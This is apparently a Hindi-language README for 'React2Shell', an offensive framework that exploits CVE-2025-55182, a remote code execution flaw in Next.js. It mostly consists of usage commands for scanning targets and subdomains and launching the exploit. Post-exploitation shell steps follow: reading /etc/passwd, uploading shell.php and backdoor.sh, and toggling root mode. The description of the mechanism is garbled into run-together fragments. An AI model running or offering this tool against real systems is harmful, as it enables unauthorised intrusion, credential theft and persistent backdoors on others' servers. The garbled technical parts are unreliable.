
CVE-2025-55182 (Next.js RCE) के लिए स्वचालित शोषण ढांचा जिसमें सबडोमेन गणना, भेद्यता स्कैनिंग, पेलोड निर्माण, और फ़ाइल संचालन के साथ इंटरैक्टिव रिमोट शेल शामिल है।
CVE-2025-55182 (Next.js रिमोट कोड निष्पादन) के लिए उन्नत शोषण फ्रेमवर्क
लेखक: opsecramdan
React2Shell एक शोषण फ्रेमवर्क है जो Next.js-आधारित अनुप्रयोगों में CVE-2025-55182 भेद्यता की पहचान और शोषण करने के लिए बनाया गया है।
यह उपकरण सभी-एक-में आक्रामक टूलकिट के रूप में डिज़ाइन किया गया है, जिसमें शामिल हैं:
यह भेद्यता Next.js के आंतरिक तंत्र का निम्नलिखित तरीके से लाभ उठाती है:
/login?a=) के माध्यम से परिणाम लीक करें//api/api/auth/_next/admin/dashboardsudo -i निष्पादननिर्भरताएँ स्थापित करें: pip install requests dnspython
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
cd react2shell-cve-2025-55182
python3 react2shell.py
python3 react2shell.py -u https://target.com
प्रोटोकॉल के बिना:
python3 react2shell.py -u target.com
python3 react2shell.py -f targets.txt
targets.txt की सामग्री का उदाहरण:
https://target1.com http://target2.com:3000 target3.com
python3 react2shell.py -d example.com
प्रवाह:
python3 react2shell.py -d example.com -w wordlist.txt
python3 react2shell.py -d example.com --debug
शोषण सफल होने के बाद, आपको शेल तक पहुँच मिल जाएगी।
whoami
id
uname -a
pwd
ls -lah
.upload shell.php /tmp/shell.php
.download /etc/passwd
.create /tmp/test.txt
python3 react2shell.py -d example.com
whoami
.upload backdoor.sh /tmp/backdoor.sh
उपकरण उत्पन्न करेगा:
यदि सफलतापूर्वक शोषण किया जाता है:
यह उपकरण केवल इसके लिए बनाया गया है:
अवैध गतिविधियों के लिए उपयोग निषिद्ध है।
यह परियोजना दर्शाती है:
| कमांड | विवरण |
|---|
| .root | रूट मोड टॉगल करें |
| .upload | लक्ष्य पर फ़ाइल अपलोड करें |
| .download | लक्ष्य से फ़ाइल डाउनलोड करें |
| .create | लक्ष्य पर फ़ाइल बनाएँ |
| .save | आउटपुट को स्थानीय फ़ाइल में सहेजें |
| .exit | शेल से बाहर निकलें |